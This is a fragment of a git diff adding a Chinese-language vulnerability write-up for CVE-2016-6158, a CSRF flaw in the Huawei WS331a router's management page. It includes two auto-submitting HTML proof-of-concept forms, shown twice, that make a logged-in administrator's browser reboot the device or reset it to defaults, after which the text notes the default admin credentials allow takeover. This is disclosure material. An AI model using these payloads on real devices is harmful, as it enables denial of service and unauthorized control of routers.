+|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
+--------|--------|---------|--------|-------|----|------|
+|华为WS331a产品管理页面存在CSRF漏洞|2016-09-07|zixian（me@zixian.org）|[http://www.huawei.com/](http://www.huawei.com/) | [http://www.huawei.com/](http://www.huawei.com/) |WS331a-10 V100R001C02B017SP01及之前版本 | [CVE-2016-6158](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6158)|
+
+### POC实现代码如下：  
+
+> 当管理员登陆后，打开如下poc页面，WS331a设备将重启。
+``` html
+<form action="http://192.168.3.1/api/service/reboot.cgi" method="post">
+</form>
+<script> document.forms[0].submit(); </script>
+```
+> 当管理员登陆后，打开如下poc页面，WS331a设备将恢复初始化配置。设备自动重启后不需要密码即可连接热点，并使用amdin/admin对设备进行管理控制。   
+
+```html
+<form action="http://192.168.3.1/api/service/restoredefcfg.cgi" method="post">
+</form>
+<script> document.forms[0].submit(); </script>
+```
\ No newline at end of file
diff --git a/华为WS331a产品管理页面存在CSRF漏洞.md b/华为WS331a产品管理页面存在CSRF漏洞.md
new file mode 100644
index 0000000..c1cbfc7
--- /dev/null
+++ b/华为WS331a产品管理页面存在CSRF漏洞.md
@@ -0,0 +1,28 @@
+### 漏洞简介  
+
+|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
+--------|--------|---------|--------|-------|----|------|
+|华为WS331a产品管理页面存在CSRF漏洞|2016-09-07|zixian（me@zixian.org）|[http://www.huawei.com/](http://www.huawei.com/) | [http://www.huawei.com/](http://www.huawei.com/) |WS331a-10 V100R001C02B017SP01及之前版本 | [CVE-2016-6158](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6158)|  
+
+#### 漏洞概述  
+
+> 华为WS331a 是一款便携无线路由器。
+WS331a产品的管理页面中存在一个CSRF漏洞，未经过认证的攻击者可以利用此漏洞发起CSRF攻击。成功利用此漏洞，攻击者可以向受影响设备提交特定请求进而导致设备恢复出厂设置或者重启。 (漏洞编号:HWPSIRT-2016-07078)
+此漏洞的CVE编号为：CVE-2016-6158。  
+
+
+### POC实现代码如下：  
+
+> 当管理员登陆后，打开如下poc页面，WS331a设备将重启。
+``` html
+<form action="http://192.168.3.1/api/service/reboot.cgi" method="post">
+</form>
+<script> document.forms[0].submit(); </script>
+```
+> 当管理员登陆后，打开如下poc页面，WS331a设备将恢复初始化配置。设备自动重启后不需要密码即可连接热点，并使用amdin/admin对设备进行管理控制。   
+
+```html
+<form action="http://192.168.3.1/api/service/restoredefcfg.cgi" method="post">
+</form>
+<script> document.forms[0].submit(); </script>
+```